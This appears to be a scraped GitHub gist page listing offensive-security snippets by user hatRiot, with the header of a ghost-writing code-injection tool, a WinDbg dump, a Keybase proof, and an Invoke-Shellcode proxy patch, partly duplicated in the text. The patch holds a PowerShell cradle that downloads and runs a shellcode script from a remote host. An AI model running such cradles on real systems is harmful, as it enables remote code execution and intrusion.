bryan alexander hatRiot

## ghostwrite.cpp
/*
 simple x64 implementation of the ghost writing code injection technique. note this is JUST FOR REFERENCE and won't
 work in your sweet new c2 off the shelf. it also uses capstone. check out pinjectra for a more feature rich and stable version of this.
*/

#include "stdafx.h"
#include <Windows.h>
#include "include/capstone/capstone.h"

#pragma comment(lib, "capstone.lib")

## gist:b42a33ad1310226bb1466e34f2e9d50c
0:023:x86> dt _IMAGE_IMPORT_DESCRIPTOR 0x40000+0x91d0+0n40
ole32!_IMAGE_IMPORT_DESCRIPTOR
   +0x000 Characteristics  : 0x9290
   +0x000 OriginalFirstThunk : 0x9290
   +0x004 TimeDateStamp    : 0
   +0x008 ForwarderChain   : 0
   +0x00c Name             : 0x99be
   +0x010 FirstThunk       : 0x900c
0:023:x86> da 0x40000+0x99be
000499be  "KERNEL32.dll"

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hatRiot
                / keybase.md
            
            
              Created
              August 21, 2015 18:38
            
          
    Keybase proof

I hereby claim:

I am hatRiot on github.
I am droner (https://keybase.io/droner) on keybase.
I have a public key whose fingerprint is B6F4 7EF5 4F44 CC36 1731  60E1 13A4 51C8 439D 800A

To claim this, I am signing this object:

  
## Invoke-Shellcode-Proxy
# apply to Invoke-Shellcode.ps1
# invoke with:
# PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1")

596,599c596
<
<         $proxy = [System.Net.WebRequest]::GetSystemWebProxy()
<         $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
<
---
	/*
	simple x64 implementation of the ghost writing code injection technique. note this is JUST FOR REFERENCE and won't
	work in your sweet new c2 off the shelf. it also uses capstone. check out pinjectra for a more feature rich and stable version of this.
	*/

	#include "stdafx.h"
	#include <Windows.h>
	#include "include/capstone/capstone.h"

	#pragma comment(lib, "capstone.lib")
	0:023:x86> dt _IMAGE_IMPORT_DESCRIPTOR 0x40000+0x91d0+0n40
	ole32!_IMAGE_IMPORT_DESCRIPTOR
	+0x000 Characteristics : 0x9290
	+0x000 OriginalFirstThunk : 0x9290
	+0x004 TimeDateStamp : 0
	+0x008 ForwarderChain : 0
	+0x00c Name : 0x99be
	+0x010 FirstThunk : 0x900c
	0:023:x86> da 0x40000+0x99be
	000499be "KERNEL32.dll"
	# apply to Invoke-Shellcode.ps1
	# invoke with:
	# PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1")

	596,599c596
	<
	< $proxy = [System.Net.WebRequest]::GetSystemWebProxy()
	< $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
	<
	---